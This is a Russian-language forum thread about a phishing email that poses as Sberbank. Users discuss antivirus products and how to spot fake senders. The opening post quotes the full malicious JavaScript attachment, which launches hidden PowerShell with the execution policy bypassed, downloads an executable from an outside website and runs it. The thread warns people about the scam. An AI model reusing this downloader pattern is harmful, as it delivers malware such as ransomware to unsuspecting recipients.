В вы давно проверялись на вирусы?
 

Интересное письмо пришло с адреса [email]osipov.s@sbr.ru[/email]:


Уважаемый клиент!
ОАО "Сбербанк" желает Вам приятного дня.

Пожалуйста, внимание на счет в приложении.
По всем вопросам обращайтесь к нашим менеджерам.

С уважением

Павел Осипов.

Менеджер по работе с индивидуальными клиентами

---

приложен файл "выписка426.zip", где находится ява-скрипт следующего содержания:

var lidizzz = new ActiveXObject("shell.application");
lidizzz.ShellExecute("cmd.exe", "/c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://www.see21dale.com/wp-content/plugins/libravatar-replace/vipiska.exe','%APPDATA%.exe');Start-Process '%APPDATA%.exe'", "", "open", 0);
var CnQDSbuOWkzeHCF = 582724;


Что-то там скачивает из интернета и потом запускает. Корочи, будьте бдительны.

А вы часто вирусы ловите или всегда предохраняетесь? Какой антивирус стоит?

я сообщения с незнакомых адресов с вложениями вообще не открываю никогда и сразу в спам посылаю.
п.с. стоит лицензионный аваст.

Тут и адрес email выглядит правдоподобно: [email]osipov.s@sbr.ru[/email]:

Прям, как будто действительно из Сбербанка шлют.

2-Marr >да хоть от самого медведева. с вложениями - сразу втопку.

Аваст
Я не открываю незнакомые ссылки
А сбер все шлет по смс

0-Marr > KIS лицензия стоит. Вирусов не видел давно, даже не знаю просто их нет или благодаря антивирю?

3-gasana > а если фотки шлют или доки? Что значит с вложениями в топку?

Кстати, под этим вложением mail.ru как обычно написало "Вирусов нет. Проверено антивирусом Касперского" :)

6-Стажер >сразу? не предупредив?)
я не про корпоративную почту есличо. а про личный ящик.

8-gasana > ну и про личный ящик. Я открываю все что не опасно.
опасные вложения почтовик и сам блокирует и КИС блокирует и глазами отличаю.

И что значит сразу? Ну вот помнится фоткались на экскурсии, я оставил ящик просил фотки скинуть. Скинули. Ну было штук 12 писем с архивами 7z с jpg внутри, чего не открыть?
Другое дело если ярлык там или url файл или вовсе экзешник - тогда ясное дело запускать не надо :)

0-никогда спам не открываю, удаляю.

9-Стажер >по фразе в теме письма можно это определить даже его не открывая :-)

Что-то стоит. Каждый месяц ввожу ключи.

0-Marr >два дня назад сдал кровь из вены для проверки на инфекции.

13-SIMATIC >серьёзно ты обеспокоен.

че то как-то подозрительно выглядит сообщение все равно. может позвонить им и спросить, возможно ли получить такое письмо?

[quote=Marr;42702587]Тут и адрес email выглядит правдоподобно: [email]osipov.s@sbr.ru[/email]:[/quote]
У сбера адреса почты @sberbank.ru

судя по dale.com/wp это либо массад либо ми-7 ))

[quote=Marr;42702540] Какой антивирус стоит? [/quote]
давно уже предлагается официальный бесплатный Касперский
есть масса бесплатных антивирусов - AVG и т.д.

19-F11 > от запуска этого скрипта антивирус не спасет. Тем более, что касперский показывает - вируса внутри архива нет.

20-Marr > спасибо что предупредил

14-ГолаяПравда > да вообще..

я презарватив одел на ноут

23- Думаешь поможет?!

24-Veronika_S >я не думаю, а знаю. В ай-ти сфере же работаю.

25- Вам их там выдают в неограниченном количестве?)))

26-Veronika_S >ага, прячем по карманам, для личного использования.

баянище же :))

2-Marr > посмотри домен.. sbr.ru - пустое имя.. на продажу..никакого отношения к сберу не имеет... элементарно же :)

Пользуюсь AVG, давно уже, нормально.

Это не вирус. Никакой антивирус не поможет. Это самый обычный скрипт файл, который уже скачивает непонятно что с левого сайта и запускает с помощью оболочки PowerShell. Что сделает загруженный файл - бог весть. Реальная защита только одна: любое вложение проверять на свойства. Не веря никому. Хоть от самого Темнейшего мыло придет :-). Но доступно не каждому, да. Клевещут, что в DNC именно так и попались.

Нет личной почты на бесплатных серверах. А в корпоративную сомнительным письмам не прорваться.

31-Colder >похож на шифровальщик с именем vipiska.exe
Друг на работе пропустил подобное письмо и Каспер не помог. зашифровал он ему весь диск. За ключ попросили 15 т.р.

На компе юзаю третий год симантек антивирус. Стоит не особо дорого, около тысячи в год. Вполне меня устраивает, никаких проблем за это время не было.
ЗЫ. Но я и по порносайтам не шляюсь, где шифровальщики обычно, гнездятся.

34-SIMATIC > Антивирус борется с вирусами, а со скриптом, который стартует сам пользователь можно бороться только ограничением пользовательских прав на доступ к файлам, либо созданием виртуальной машины вне локального доступа.

35-BoiledEyeInTheRectum > да это понятно, но автор спросил про вирусы, я ответил )

ЗЫ. Для потенциально опасных сайтов типа зайцев.нет и иже с ним использую параллельно установленный на ноуте Линукс.

Купил планшет а в нем оказался вшитый вирус (
Придётся сдать в магазин... Чувствую мороки будет много.(((
В общем интернет растёт развивается и потребители интернета это всего лишь ходячие кошельки... Так что чегото хорошего от интернета ждать глупо...

37-Ginger > а что за планшет такой с вирусом?

38-Marr >TEXET X-pad... Дешевенький конечно, но все равно такая подлянка как вшитый в базовую прогу вирус это уже перебор... Вирус не особо зловредный, просто регулярно вывешивает банеры приглашающие на платные сайты. Раздражает (

39-Ginger > может быть вы как-то подхватили этот вирус и он заразил базовую прогу? Или по отзывам у многих такие проблемы?